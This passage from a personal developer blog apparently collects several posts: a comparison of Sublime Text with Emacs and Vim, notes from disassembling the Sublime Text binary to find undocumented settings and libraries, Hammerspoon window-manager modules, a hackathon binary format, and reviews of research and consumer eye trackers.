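To make it concrete what that workflow amounts to, here is a minimal Python sketch of a literal (non-regex), case-insensitive search and replace over a glob of files. This is not how Sublime implements it; `replace_literal` and its parameters are hypothetical names made up for illustration, and it assumes the files are UTF-8 text.

```python
import re
from pathlib import Path


def replace_literal(root, glob, needle, replacement, dry_run=True):
    """Literal, case-insensitive search/replace in files under root matching glob.

    Returns {relative path: number of matches}. With dry_run=True nothing is
    written, which mirrors refining the query before committing to a replace.
    """
    root = Path(root)
    # re.escape makes every special character in the query match literally.
    pattern = re.compile(re.escape(needle), re.IGNORECASE)
    hits = {}
    for path in sorted(root.rglob(glob)):
        if not path.is_file():
            continue
        text = path.read_text(encoding="utf-8")
        # A function replacement keeps backslashes in `replacement` literal too.
        new_text, count = pattern.subn(lambda match: replacement, text)
        if count:
            hits[str(path.relative_to(root))] = count
            if not dry_run:
                path.write_text(new_text, encoding="utf-8")
    return hits
```

Calling it first with `dry_run=True` and a narrower glob corresponds to the "narrow it down" and "refine" steps, and a final call with `dry_run=False` performs the replacement.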

I tried to do this in Emacs once, and had to spend a ton of time Googling and investigating M-x listings:

Look up how to search in project without regex (I’ve never figured out a way to do this)
Look up the shortcut for pasting into the minibuffer (I use Evil so I can’t use p like usual).
Hope that the command is Helm-based so I can edit my query, otherwise re-type everything to narrow it down.
Look up how to replace in project without regex, oops it’s an entirely different command from searching.
Re-enter everything into the new command and run it.

Navigating Multiple Files

The last major problem I had was how difficult it was to work with code spread across multiple files compared to Sublime Text.

There are three main ways of working with files in Emacs: buffers, files and windows.

I tried using buffers but the problem is that buffer switching is slow and difficult. It only takes one keystroke to switch to the most recently opened other buffer, if you remember which that is, but switching to other buffers requires waiting for a list to show, reading it, then multiple additional keys to select the right one. Buffers also tend to proliferate like mad and these lists end up enormous taking many keys to filter to the right one. They are also nearly impossible to navigate with the mouse if I’m reading code and that’s where my hand is.

Navigating using normal find-file and helm mechanics has a similar problem: switching is just slow. It takes a lot of key strokes, and those strokes sometimes involve waiting for a list to appear that you can read.

Having your frame/screen split into a bunch of windows (Emacs reverses the meaning of window and frame from every other editor) in Spacemacs has the advantage that each window has a number on it and you can hit SPC+1 to SPC+9 to switch directly to them. This is great in that it is very fast and easy to remember, find and see where you want to go and how to get there. The problem is that you sacrifice screen real estate for every new file you work with. I normally ameliorate this with golden-ratio mode, which shrinks unfocused windows, but they still take up space.

With Sublime Text I use tabs, which are amazing. I can switch quickly and directly between files with cmd+1 to cmd+9, see all the files I’m working with at a glance, and navigate with the mouse if I want to. I can also easily rearrange tabs so that the most frequently used and important files are on lower consistent numbers that I can subitize. I can even use ZenTabs to ensure that I only ever have my 9 most recently used files open in tabs, eliminating buffer proliferation. Infrequent but useful actions like moving a file between windows and panes, and copying the file path are all obvious discoverable mouse actions. The file I’m working on always fills the full screen, unless I want to reference other code in another pane. When the file I want isn’t a tab I can open it with “Goto Anything”, which is similar in speed to narrowing to a buffer by name. When I want to navigate based on a project’s directory structure I have access to a fantastic file tree.
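
The "only my 9 most recently used files" policy is easy to picture as a small data structure. The sketch below is my own illustration of that idea, not ZenTabs' actual code; `RecentTabs`, `focus` and `open_tabs` are hypothetical names.

```python
from collections import OrderedDict


class RecentTabs:
    """Keep at most `limit` tabs open, closing the least recently used one."""

    def __init__(self, limit=9):
        self.limit = limit
        self._tabs = OrderedDict()  # least recently used first, newest last

    def focus(self, path):
        """Record that `path` was opened or focused; return the paths closed."""
        self._tabs[path] = True
        self._tabs.move_to_end(path)  # mark as most recently used
        closed = []
        while len(self._tabs) > self.limit:
            oldest, _ = self._tabs.popitem(last=False)
            closed.append(oldest)
        return closed

    def open_tabs(self):
        """Return open tabs ordered from least to most recently used."""
        return list(self._tabs)
```

Note that this orders tabs by recency, whereas in the editor I arrange tabs by hand; the sketch only captures which files stay open, not where they sit.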

Yes, Emacs has plugins to add tabs but they are hacks. They’re ugly, slow, break when used with other plugins, don’t have good keyboard shortcuts, and display tons of useless buffers I don’t care about.

When I watch friends and coworkers use Vim and Emacs this is the thing I notice most. They look super efficient since they’re furiously typing things or navigating directories, but often the file they are opening is one that they looked at just a minute ago and would have taken me a single keystroke to switch to. They however have to type a bunch of characters to narrow to the buffer name. I even frequently see Vim/Emacs users opening files by navigating directories when I would have just typed a few characters into “Goto Anything”. Emacs and Vim also have ways to fuzzy search for a file in a project, but the heuristics and tools are often so bad and slow that they give up and fall back on manually finding the file. I’ve never seen a Vim or Emacs user who navigates between files as fast as I do in Sublime.

Realization

I realized that despite all my work and the work of other contributors using Emacs was still a pain and I longed for the just-works nature of Sublime Text. It didn’t help that many operations in Spacemacs had surprisingly high latency (similar to Atom) and many things were ugly (like the file tree). I said my goodbyes to the Spacemacs community and headed back to Sublime Text.

I still think Spacemacs is overall quite good though. If you’re someone who mainly codes in one language, especially a popular one, then you can get Spacemacs set up to do exactly what you want, and the huge community nowadays means that either the bugs will have been fixed or you can easily get help with the ones you encounter. I’ve listed a bunch of disadvantages, but Emacs has powerful features that Sublime doesn’t, I just didn’t like what I had to give up to get them.

Sublime Text 3: Back With Vengeance

So I switched back to Sublime Text 3, but just like after Vim, I took some of the things I enjoyed back with me. I updated my plugin and keybinding arsenal to include many of the handy things I used in Spacemacs.

One thing I really enjoyed in Emacs was Magit, so I installed GitSavvy in Sublime and found it had almost everything I liked about Magit. I even like its workflow marginally better and the Github integration is top notch.

I set up the Alfred Git Repos workflow to replicate opening projects with Projectile, and used my OSX window tabbing plugin to manage my Sublime Windows as well.

The fanciest thing I did was create my own set of keybindings that work like Vim except with the palm keys of my custom keyboard as the mode. That way it is faster to quickly do movement and editing actions in the middle of writing. It also synergizes way better with the mouse because I am never in an unexpected mode when I use it and then move back to the keyboard, since the physical state of my hands is the state of the editor. I still drop into Vintageous mode for fancier editing though.

And all this took me only a few evenings to get to a point where I was happier with it than the Spacemacs setup that had taken me six months. I’ve been using this setup happily since mid-2015 with only a couple bugs which were quickly fixed, despite using the dev builds of ST3 and many plugins it’s been orders of magnitude more reliable than Emacs.

Jane Street

Then I went to work at Jane Street for an internship and ended up migrating back to Spacemacs for a little while. Jane Street has a bunch of internal Emacs tooling, and even a bunch of custom integration with Spacemacs, along with much more mature tooling for OCaml than Sublime Text.

It was mostly pretty good, but far from smooth sailing. Various internal and external Emacs plugins I used conflicted on their idea of where windows should go and took over other windows, almost actively replacing whichever window I cared about most. I encountered tons of bugs, both large and small. Many of these I ended up patching myself, either with dotfile snippets or pull requests.

Not only did I encounter over 20 different Emacs, Spacemacs and plugin bugs (some annoying me quite regularly) during my four months, but there were other problems. Jane Street’s massive code base made many plugins slow to a crawl. Synchronous autocompletion with Merlin occasionally hung Emacs. Using helm-projectile was unbearable without caching and slow even with it. Until I disabled a bunch of hooks saving files took seconds due to hg commands running slowly on the large repo.

Eventually I talked to the one guy using Sublime Text at Jane Street and got his set of plugins and settings for working on Jane Street’s OCaml with Sublime. I modified the Sublime Merlin plugin to support tooltips that showed the inferred type of an expression and clickable links to the file of definition and declaration.

I then started using Sublime Text for sprees of reading code, but not for writing it. Sublime still had far worse support for building and indenting Jane Street code. But, this way I could understand things faster by using quick fuzzy search of files, excellent tabs, smooth scrolling with the mouse, and tooltip links to navigate the codebase.

Eventually I started using Sublime for editing as well, after I improved indenting, highlighting and autocompletion slightly. I still kept Emacs open to run the source control, code review and Jenga build plugins, but I set up elisp so that it navigated to compile errors in both Sublime Text and Emacs. This offered an excellent compromise between nice plugins and a good editor that I was happy with.

Despite all the additional functionality and improvements I made to Sublime, I actually think I spent less time on getting Sublime to work than on fixing, debugging and setting up Spacemacs while I was there.

Closing Thoughts

Overall, I’m still very satisfied with Sublime Text. I think text editors could go a lot further than they are now, but so could most software. I feel very productive, I never fight my editor, and it works for any language I throw at it.

I would love it if Sublime was open source, or if there was an open source editor that was as good. However, I realize that many of the reasons I love Sublime wouldn’t be possible without it making money. The reason the creator(s) can pour so much effort and care into every detail is that Jon (and now also Will) can work on it full time for years. No other text editor has a custom cross-platform UI toolkit, a custom parallel regex engine, and incredibly fast indexing, search and editing engines.

I also realize that in some respects Sublime’s rather limited plugin API is an advantage. Unlike Emacs/Vim/Atom I rarely have to worry about plugins slowing down my experience by accidentally doing something synchronously on the entire file, since the API almost enforces asynchronous design. No plugin can break core functionality or slow startup times. Plugins are forced to work only in ways where it is difficult to conflict with each other since two plugins can’t implement hacks in the internals that interfere with each other. When Emacs plugins implement “helpful” hacks to basic functionality that conflict and break things, my approach is often to disable them since I rarely want these hacks anyway.

Sublime can also get faster and better every release because they don’t have to worry as much about piles of hacks restricting how they can change their internals. Atom, by contrast, constantly has to deprecate old APIs whenever they restructure to improve performance.

Also, the recent dev builds have patched what I think was the number one hole in Sublime’s plugin API: tooltips and inline annotations. Now plugins can implement fancy custom tooltips with links and colours and formatting using a subset of HTML. This same HTML subset can also be used to inject “phantoms”: rich text annotations of code for things like previewing LaTeX formulae, colours, types, lints and errors. This should allow most of the useful plugins that previously were only possible in Atom/Emacs to be ported to Sublime, but since it is implemented centrally instead of a bunch of different ways it will work seamlessly and consistently.

I’m optimistic for the future of Sublime Text. I’d love to see a new editor that’s open source and as fast, nice and powerful as Sublime, but I don’t expect to since it would be a ton of work. Visual Studio Code looks pretty awesome though, if I was writing Javascript I’d consider it for the excellent tooling integration, but for less common languages it doesn’t look any better than Sublime.

I wrote this post because I often find myself justifying my use of Sublime Text to Vim and Emacs users. They often look at Sublime users as people who just haven’t put in the effort to learn a real power user’s text editor. They’re confused when they learn that I have tried Vim and Emacs extensively and still choose to use what they see as a basic newbie editor. I hope this post explains why Sublime is an excellent choice for a highly customizable power user’s text editor.

Edit: FAQ

Some responses to questions I’ve seen raised after posting this:

You just haven’t learned Vim. A real Vim user could do long distance text selection faster.

I think I know vim quite well, I’ve been using vim bindings for 5 years now across varying editors. I know almost all Vim bindings.

How about a test? Suppose my cursor is on line 198 of this file and I want to copy match_pat.has_captures && cur_level.captures.is_some() on line 172. If you give me an efficient sequence of vim bindings for that movement I can tell you if I know what everything does without looking it up.

I think a more apt criticism would be that I think too slowly to use Vim. I can figure out that “26j4wy10e” does what I want, and at my normal english characters/second typing speed that is faster than doing the selection with my mouse. However, when I actually try and do that without figuring it out ahead of time I take longer to read, count and figure out the right numbers and actions, then type the individual characters (which due to muscle memory for english I’m slower at than typing english). I end up being slower than the mouse, and with a higher mental load.

You could say I just need to “git gud” and practice, but if practicing for hours a day for 5 years doesn’t get me to the point that I’m better than the mouse, I think it’s time to say that maybe it isn’t a lack of practice. More likely it’s an innate skill difference, processing speed, counting, typing coordination, or a combination of the above. I do actually use Vim bindings a lot of the time, I know them well, and I know when it is faster for me to use the mouse.

That all presumes that there exists a substantial number of people who are faster in practice at long distance text selection with vim shortcuts than I am with the mouse. I have yet to see someone where I can confidently say that is the case, and I’ve watched a reasonable number of vim users. Some are within the margin of error where I would have to do a timed race with a stopwatch, but I haven’t seen any that are clearly meaningfully faster. I guess everyone I’ve seen using vim (including many 5+ year users) could be a “vim n00b”, but that sounds a bit “no true scotsman”-like.

If you used stock Emacs without all the bloat it would be faster and stable.

Yes it would have been faster and more stable, however then I would just complain about the lack of a bunch of features from Sublime that I like, and the terrible keybindings.

I also have minor RSI issues, I’m not keen to turn them into major RSI issues by using Emacs bindings.

You can only switch directly to a few tabs, buffer switching is logarithmic time for many buffers.

Yes, but tabs are more like a cache. Like I mention, when it isn’t easy to hit the numbered shortcut to jump directly to a tab I use “Goto Anything” to narrow directly to the file, which takes the same amount of time buffer switching would.

Tabs are just an additional speedup in the case that I’m switching to one of my ~6 most recently/frequently used files. I’d say it’s the case that over 95% of my switches are to one of my tabs, but only at most 50% of my switches are to my most recently used other file, there’s gains to be had over Emacs in that extra 45% of switches that become fast.

Disassembling Sublime Text

2016-12-03T00:00:00+00:00

This afternoon I spent some time with the free trial of the Hopper Disassembler looking through the binary of Sublime Text 3. I found some interesting things and some undocumented settings.

Undocumented Settings

The most potentially useful and interesting things I found were some undocumented settings for Sublime Text. A couple of them could even be useful to some people:

draw_shadows: A boolean that can disable the shadow effect when any line is longer than the window. I personally like the effect but if you want a cleaner look or your window is only slightly wider than your text and the shadow effect kicks in early, you can use this setting.
indent_guide_options:
- solid: This is an undocumented option that makes indent guides solid instead of dashed. Add this in addition to a draw_* option.
- draw_active_single: Like draw_active but only draws the innermost indent guide your cursor is in instead of guides for every indent level down to it.
draw_debug: A boolean that if true enables a special debugging text renderer. It seems to turn sections of the document either blue or red, and within the sections it turns tokens alternating light and dark shades of those colours. Note you have to set the setting to false to turn it off, not just delete it. These change sometimes when scrolling and editing but I can’t figure out when and why.
wide_caret: This just acts like adding to caret_extra_width, probably an old setting, not useful.

There are also some undocumented command line flags:

--multiinstance: Starts a new instance of Sublime even if one is already running.
--debug: Prints debug output to stdout, I think this is just the output that goes in the built-in console.

I discovered these settings by running strings on my Sublime Text.app/Contents/MacOS/Sublime Text binary, looking near the things I knew were config options for things that looked like config options, then trying them out.
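As a rough sketch of that process, here is a small Python stand-in for the strings tool plus a filter for setting-like names. The snake_case heuristic and the function names are assumptions made for illustration; the actual search was done by eye, looking near known options.

```python
import re

def extract_strings(data: bytes, min_len: int = 4) -> list[str]:
    """Return runs of printable ASCII at least min_len long, like `strings`."""
    pattern = rb"[\x20-\x7e]{%d,}" % min_len
    return [m.decode("ascii") for m in re.findall(pattern, data)]

def looks_like_setting(s: str) -> bool:
    """Heuristic (an assumption): settings are lowercase snake_case words."""
    return re.fullmatch(r"[a-z]+(_[a-z]+)+", s) is not None

def candidate_settings(data: bytes) -> list[str]:
    """Sorted, de-duplicated strings from the binary that look like settings."""
    return sorted({s for s in extract_strings(data) if looks_like_setting(s)})
```

To try it on a real binary, read the file with open(path, "rb").read() and pass the bytes to candidate_settings. Expect plenty of false positives, so each candidate still has to be tried out by hand.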

Libraries Used

The Sublime Text release binaries don’t have symbol names stripped out, probably for debugging reasons, and for that I’m very grateful because it’s really cool. The assembly is still largely indecipherable to me, but there are some cool things I can find out.

From the function names I can also see some of the libraries used in the making of Sublime Text. Here’s a partial list:

Skia: It’s been mentioned online this is used for rendering everything
Google densehash: Faster hash map, used everywhere
Oniguruma: Fallback for fancy regexes the custom engine can’t handle
Boost
Google breakpad
CryptoPP/Crypto++ (in old versions, now replaced with libtomcrypt)
leveldb: Used to store symbol indexes I think
snappy: Fast compression, not sure what it is used for
Hunspell
YAML (apparently actually yaml-cpp)
lzma
Hunzip: Probably what is used to unzip the zipped up package format
libtomcrypt

Internal names

I can also see some general architecture and what things are named. This is just cool trivia.

sregex: The custom super fast regex engine. I think the special feature is that it can search for many different regexes on one piece of text at the same time, because when I wrote a sublime-syntax highlighter that’s what I would have wanted.
skyline: The name for Sublime’s widgets framework. The centerpiece is skyline_text_control.
px: The windowing and platform integration framework used for event handling, file management and other OS integration across Windows, Linux and OSX.
TokenStorage: The class that stores and renders highlighted tokens.

God how I wish any of these were open source. Each of these would be useful in many things other than text editors. There’s no app I know of that has its own custom-rendered UI framework that manages to be as fast and smoothly integrated with the OS as skyline and px are. The custom regex engine would be a handy library as well. I do understand that these goodies might not have existed in the first place if Jon couldn’t make money off of Sublime Text though, so I’m grateful that I at least have one beautiful and fast cross-platform app.

I also tried to figure out how some parts of the editor work and why they are so fast, but I couldn’t figure out much from the assembly. All the key functions have hundreds of basic blocks and are enormous with everything inlined. If I spent an entire day I might be able to reverse engineer one function, but that wouldn’t get me very far.

If there’s anything you’re interested in about Sublime Text’s internals, leave a comment and I might take a look. Especially if it’s a tiny behaviour improvement that isn’t accessible to the plugin API but might be possible to patch in the binary, with a debugger, or with something like Frida.

Edit: Updates

After this article was posted on Hacker News and cross-posted to the Sublime forum, @wbond, the Package Control maintainer and new Sublime developer replied with some corrections and new info. I’ve updated the library listing above with the new info.

Advanced Hackery With The Hammerspoon Window Manager

2016-07-16T00:00:00+00:00

Along with Dash, Sketch and Papers, one of the main reasons I haven’t yet switched to Linux is Hammerspoon. Hammerspoon gives me most of the power that a fancy Linux tiling window manager and configurable desktop would give me, without having to switch operating systems. It’s fully configurable with Lua, has tons of built in modules and it is simple to write your own modules. I think of it more as a general-purpose tool for modifying OSX’s user interface than just a window manager. This post explores some of the ways I’ve used Hammerspoon to greatly enhance my general OSX-using experience.

Window Hints

The first Hammerspoon module I wrote was a port of Slate’s window hints, which if you’ve ever used Vimium or Vimperator, are like link hints for windows. They allow you to switch to any window with only two keystrokes: One shortcut to bring up icons and letters for every window, and then simply hitting the key corresponding to the window you want.

The module was written mostly in a single evening as a native Lua module (originally for Mjolnir, the precursor to Hammerspoon). It didn’t take much time, and is very enjoyable to use, and because the module was added to the core Hammerspoon distribution, lots of other people can also benefit from it.

Window Tabs

The second Hammerspoon module I wrote was one that allows you to add tabs to any OSX Application. The tabs sit in the top right of the title bar and allow you to easily switch between windows of an app with keyboard shortcuts (e.g ctrl+tab number) and later by clicking. This was originally motivated by my switching to Spacemacs and it not having a good solution for working on many different projects like Vim tabs. This module allowed me to wrangle Emacs windows to more easily switch between different projects. I later repurposed it to switch between Sublime Windows for the same reason when I switched back to Sublime Text.

This module was very different to write since it was pure Lua. It uses Hammerspoon’s various powerful built-in modules including the drawing module, the app watcher module, and the window listener module.

Mouth Noises

Most recently I contributed a module for recognizing mouth noises. It is based off some low-latency high-accuracy mouth noise recognizers I wrote during my research term at the UWaterloo HCI lab. Personally I use this module to scroll pages hands-free while lying down on the couch with my laptop. Previously I had to contort my hand into a cramped position on my chest to scroll with the trackpad while lying on my back. It’s one of my zanier uses of Hammerspoon but it is nice to use nonetheless. Just goes to show the variety of user interface scripting tasks Hammerspoon can do.

Custom Window Management Hotkeys

I love being able to customize my window management shortcuts perfectly for the kind of things I normally do. I have a custom modifier key on my keyboard that is dedicated to window management I call hyper. Pressing hyper in combination with the left home row jumps directly between my most frequently used apps (Chrome, Sublime, iTerm2, Mail, Path Finder) and a pair of keys that mark a certain window and focus it, for all the other apps I use occasionally like PDF readers when writing LaTeX. Pressing hyper with the right home row moves a window between full screen, halves of the monitor, and between screens. Various other hyper shortcuts do things like toggling mouth noise recognition. I also have a hotkey I can hit when I plug in my external monitor that arranges all my apps between monitors in the way I like them instantly.

Miscellaneous Hackery

I’ve used Hammerspoon for some one-off tasks, especially when I want to bind things to global keyboard shortcuts. An example of this is a weekend project I did to make a mouse controlled by head movements detected by an accelerometer on a microphone headset. I used Hammerspoon to send serial commands to the microcontroller when I pressed a shortcut to toggle the mousing on and off.

Conclusion

I hope this has given you some ideas about how you can use Hammerspoon to make your computing experience more pleasant. Check out my Hammerspoon config to see how I configure everything and tie it all together. For more inspiration check out the amazing things asmagill does in his config. He has experimental modules for all sorts of things like drawing calendars, custom app menus, fonts and speech control.

Simple Binary Formats and Terrible Hacks

2016-04-03T00:00:00+00:00

Last weekend me and my friend Marc went to TerribleHack III and made Dayder, a neat little website for finding spurious correlations in lots of time series data sets. I did the ingestion of our initial data set of causes of death over time, as well as the JS/HTML front end. Marc made the correlation finding web server in Rust and also did the final prettying up of the CSS. I’m quite proud of how well it turned out given that it was made in 12 hours.

The coolest part of Dayder is how fast it is. All the DOM and JS Canvas rendering code is custom built for rendering hundreds of graphs in milliseconds. Marc and I also designed a custom simple binary format for storing time series data in a compact way. We called the format btsf and it is a key reason why our app can quickly send tons of time series data sets to the client as well as store them on the server in a compact way. All 6591 time series fit in less than 1 megabyte of data, allowing them all to be sent to the client for instantaneous filtering.
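To give a flavour of what a simple binary time series format can look like, here is a minimal sketch. This is not the actual btsf layout: the magic bytes, field order and field widths below are all made up for illustration.

```python
import struct

MAGIC = b"TSF0"  # made-up magic bytes, not the real btsf header

def encode_series(name: str, points: list[tuple[int, float]]) -> bytes:
    """Pack one named series as: magic, name length, point count, name, points."""
    name_bytes = name.encode("utf-8")
    header = MAGIC + struct.pack("<HI", len(name_bytes), len(points))
    # Each point is a little-endian int32 time and float32 value (8 bytes).
    body = b"".join(struct.pack("<if", t, v) for t, v in points)
    return header + name_bytes + body

def decode_series(buf: bytes) -> tuple[str, list[tuple[int, float]]]:
    """Inverse of encode_series."""
    if buf[:4] != MAGIC:
        raise ValueError("bad magic")
    name_len, count = struct.unpack_from("<HI", buf, 4)
    offset = 4 + struct.calcsize("<HI")
    name = buf[offset:offset + name_len].decode("utf-8")
    offset += name_len
    points = [struct.unpack_from("<if", buf, offset + 8 * i) for i in range(count)]
    return name, points
```

With this hypothetical layout each data point costs 8 bytes, compared to a dozen or more characters per point in a typical JSON encoding, which is the kind of saving that makes sending every series to the client practical.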

The following week I gave a short talk at a UWaterloo CS Club event about simple binary formats and how they can make your project faster, easier and cooler:

Now that I’ve used simple binary formats for both Rate With Science and Dayder, I’m a big fan. Although outside a hackathon context where I have time to learn libraries and where I don’t have the incentive to design new formats for fun, I think I would probably go with something established like Cap’n Proto or Thrift instead of a custom format.

Eye Tracker Reviews: Pupil Labs, Tobii, Eye Tribe, XLabs

2016-03-24T00:00:00+00:00

During my time at the UWaterloo HCI Lab I’ve had the opportunity to try out 5 different eye trackers and compare them. These eye trackers span the price range from free to $10,000+ and use a variety of different tracking methods. These trackers are also not always direct alternatives, they are often meant for very different scenarios.

Disclaimer: These are the results that I got for myself using these eye trackers. Eye tracking performance varies wildly between people so it is likely that for some of these trackers I got atypically bad or good performance. When my results don’t square with claimed performance or performance I’ve seen in videos I’ll try and note that.

Also, I have not done exact degrees accuracy tests on any of these trackers. I may however give figures in degrees, so here’s what I mean by them: whenever I test these out, the tracked point or the filtered point (if there is jitter) is with high probability within a given distance of my real gaze point. I then use trigonometry to work out the angle in degrees corresponding to that distance. A handy rule of thumb is that each degree corresponds to about a centimeter of distance at a typical screen-head distance of 60cm ( tan(1.0*(pi/180))*60 ≈ 1.05 ).

With that out of the way let’s move on to the trackers:
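The conversion between on-screen distance and visual angle can be sketched in a few lines of Python. The function names are just for illustration, and the 60cm default viewing distance is the one used in the rule of thumb above.

```python
import math

def offset_cm_for_angle(angle_deg: float, viewing_distance_cm: float = 60.0) -> float:
    """On-screen distance covered by a given visual angle."""
    return math.tan(math.radians(angle_deg)) * viewing_distance_cm

def angle_for_offset_cm(offset_cm: float, viewing_distance_cm: float = 60.0) -> float:
    """Visual angle in degrees for an on-screen distance from the gaze point."""
    return math.degrees(math.atan(offset_cm / viewing_distance_cm))
```

For the small angles involved here the relationship is close to linear, which is why "one degree is about one centimeter" works as a rule of thumb.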

Pupil Labs Headset: My favourite research eye tracker

My lab has a Pupil Labs eye tracking headset with a high speed world camera and 120hz binocular eye cameras. It’s well suited for a variety of research, and is the only eye tracker with amazing open source software.

Pros:

Good tracking: very high precision (i.e. low jitter) and fairly high accuracy immediately after calibration (~1.5 degrees)
Allows free head motion because the eye tracker is fixed to your head.
Robustly tracks markers in order to map gaze onto surfaces like screens.
The open source software is amazing. Really good interface, easy to use, tons of features, and unlike every other eye tracker you can add any features you need yourself.
You don’t need a computer screen and you can do eye tracking experiments in other environments.
Good price for a research eye tracker (on the order of $1000), especially with academic discount.
Tolerates other IR devices. Since the tracking doesn’t use glints you can use other IR lights like an IR head tracker at the same time. It is the only eye tracker like this.
Fully cross platform: Windows, OSX and Linux.

Cons:

The headset can easily be jostled if you move your head too much or crinkle your face, and when that happens accuracy drops proportional to the change in position. The technique I’m researching requires head motion and I typically see accuracy of ~3 degrees after some head movements slightly move the headset.
Doesn’t fit with other glasses very well, and if it does fit the reflections make it worthless.
You have to wear something on your head. It is fine at first but after an hour or two can start to feel quite uncomfortable.
You have to recalibrate every single time you put it on, unlike some remote eye trackers.

Watch out for:

Eye cameras can’t adjust to get a good view of eyes very near the center of the face, I had a participant like this and it still worked but lost tracking at larger gaze angles.
If your ears move when your face moves, it will move the eye tracker out of calibration almost immediately. I had a participant like this.

Tobii EyeX / Steelseries Sentry: Best consumer eye tracker

The Tobii EyeX (or the identical Steelseries Sentry) is an incredible consumer eye tracker. One downside is it only works on Windows, but I’ve gotten around this by running the EyeX software in a VMWare Fusion VM and piping the data to my mac over UDP. Two caveats are that in order to switch to the mac and have tracking continue you have to lock the VM’s screen resolution. Also if the load gets too high on the VM sometimes the tracker will stop and take a couple seconds before it automatically restarts, this is only an issue in VMs and can be mostly avoided by running no other programs on the Windows VM.
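The UDP piping is simple in principle. Here is a minimal Python sketch of the idea; the packet layout (a timestamp plus x and y in pixels) and the function names are assumptions for illustration, and the sending side in a real setup would get its samples from the EyeX SDK inside the Windows VM.

```python
import socket
import struct

# Assumed packet layout: float64 timestamp (s), float32 gaze x and y (px).
SAMPLE_FORMAT = "<dff"

def pack_sample(timestamp: float, x: float, y: float) -> bytes:
    """Serialize one gaze sample into a fixed-size datagram payload."""
    return struct.pack(SAMPLE_FORMAT, timestamp, x, y)

def unpack_sample(datagram: bytes) -> tuple[float, float, float]:
    """Inverse of pack_sample."""
    return struct.unpack(SAMPLE_FORMAT, datagram)

def send_sample(sock: socket.socket, addr: tuple[str, int],
                timestamp: float, x: float, y: float) -> None:
    """Runs in the VM: fire one sample at the host, no acknowledgement."""
    sock.sendto(pack_sample(timestamp, x, y), addr)

def receive_sample(sock: socket.socket) -> tuple[float, float, float]:
    """Runs on the host: block until the next sample arrives."""
    datagram, _sender = sock.recvfrom(struct.calcsize(SAMPLE_FORMAT))
    return unpack_sample(datagram)
```

Both sides would create their socket with socket.socket(socket.AF_INET, socket.SOCK_DGRAM), and the receiver would bind to a port of your choosing. UDP suits this because a dropped gaze sample is harmless: the next one arrives a few milliseconds later.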

Pros:

Extremely robust to head motion: your calibration will last practically forever. You can move your head around as much as you want and still maintain decent (2-3 degrees accuracy) tracking. This means you don’t have to calibrate every time you sit down, just keep your one calibration for an arbitrarily long time. The magnetic mount is extremely repeatable so it doesn’t need to be recalibrated.
Good accuracy even on large screens: Although the accuracy degrades near corners, in general the tracker gives me ~2-3 degrees of accuracy, which is quite decent.
Comes with very nice software. The SDK is nice and the software gives you a nice calibration test screen, a very pretty gaze trace, and some handy eye tracking desktop enhancements like warping your mouse cursor.

Cons:

Low precision. There is quite a bit of jitter, but it is bounded (it is almost never more than 2cm from the center of the jitter), so can be mostly eliminated by filtering.
Windows only.
You may not record gaze data. This is a developer SDK term meant to make you buy Tobii’s more expensive trackers, it is not an issue if you’re developing interaction techniques or just using the tracker.
Your head needs to be relatively low with respect to the monitor. I prefer my head to be near the top of my monitor but this is outside the non-adjustable view of the tracker from the monitor’s bottom edge. You can fix this by tilting your monitor upwards, I was lucky that my monitor had an adjustable stand.
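Because the jitter mentioned in the cons above is bounded, even a very simple filter goes a long way. The following is a minimal sketch, not Tobii’s filter or any particular published one: it smooths small movements with an exponential moving average and snaps to the new position when a sample lands further away than the jitter bound, on the assumption that such a jump is a real eye movement.

```python
import math

class GazeFilter:
    """Smooths bounded jitter but follows large jumps immediately."""

    def __init__(self, alpha: float = 0.2, jump_threshold: float = 2.0):
        self.alpha = alpha                    # smoothing factor, 0 < alpha <= 1
        self.jump_threshold = jump_threshold  # same units as samples, e.g. cm
        self.point = None                     # current filtered gaze point

    def update(self, x: float, y: float) -> tuple[float, float]:
        if self.point is None:
            self.point = (x, y)
            return self.point
        fx, fy = self.point
        if math.hypot(x - fx, y - fy) > self.jump_threshold:
            # Too far to be jitter: treat as a saccade and jump there.
            self.point = (x, y)
        else:
            # Within the jitter bound: move a fraction of the way.
            self.point = (fx + self.alpha * (x - fx), fy + self.alpha * (y - fy))
        return self.point
```

The default threshold of 2.0 matches the roughly 2cm jitter bound described above if samples are in centimeters; alpha trades smoothness against lag and would need tuning for a real application.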

[Edit] Tobii 4C: New best consumer eye tracker

I’ve now had a chance to use the Tobii 4C for a while and it’s fantastic. Everything I said about the EyeX above applies, with the following new notes:

All the processing is now done on the device, this means very low CPU and USB loads. It now works flawlessly in VMWare Fusion.
Accuracy is similar or maybe somewhat better. It’s the most accurate eye tracker I’ve used personally.
Tobii is now working on a macOS implementation of the Stream Engine SDK (the low level C API). I’ve tried out an alpha and it works quite well. I used it to implement FusionMouse.
I tried it out in combination with a TrackIR 5 and it didn’t interfere with the tracking much, which let me combine eye tracking and head tracking that is higher accuracy than the tracking Tobii provides on Windows. I remember having problems when I tried the TrackIR with the EyeX, so either they fixed something or my setup changed enough that it works now.

The restrictions on recording data still apply though, so it’s still difficult to legally use for research, other than research on interactive eye tracking systems.

Another tip I picked up: The magnetic strips for attaching the 4C/EyeX to a monitor have very strong permanent adhesive that’s difficult to remove without breaking or bending anything. If you use double-sided foam tape you can attach the strip to a monitor in a way that’s much easier to remove. The extra distance also enables it to be mounted on some laptops.

The Eye Tribe Tracker: Good but doesn’t work well for me

The Eye Tribe tracker (I have the older $100 model) is a great piece of hardware at a great price, unfortunately it barely works for me. I’ve seen it work well for other people in videos so I’m not claiming this is a common problem, just one that I invariably experience. I’ve tried it in tons of environments with different computers, positions and eyewear. After reverse engineering it I think I have identified the problem as due to extra glints on the side of my eyes when looking away from the center of my screen. I can calibrate in the center and get ~4 degrees of accuracy within a 1000 x 1000px area, but that isn’t great.

As such, I’ve restricted my Pros and cons to discussing other issues than accuracy:

Pros:

Great price, only $100.
Works on OSX. This is better than the Tobii EyeX so if you’re looking for a consumer tracker on OSX try the Eye Tribe.
A great high speed high resolution infrared camera: I reverse engineered the control codes so you can use it for other purposes like motion tracking or writing your own eye tracking algorithms. This can’t be done easily with the EyeX since it uses a much more locked down custom USB protocol.

Cons:

Tripod mount means that if you bump it, pull the cable, or bump your monitor, you’ll have to recalibrate. This is in contrast to the Sentry, which mounts directly to your monitor. If you’re ambitious you could improvise your own clamping mount for the Eye Tribe tracker or fix the tripod and monitor in place.
Limited software: The software does very little compared to Tobii’s and Pupil’s software. It is basically just a calibration and API server.

Tobii X2-30: Great but overpriced

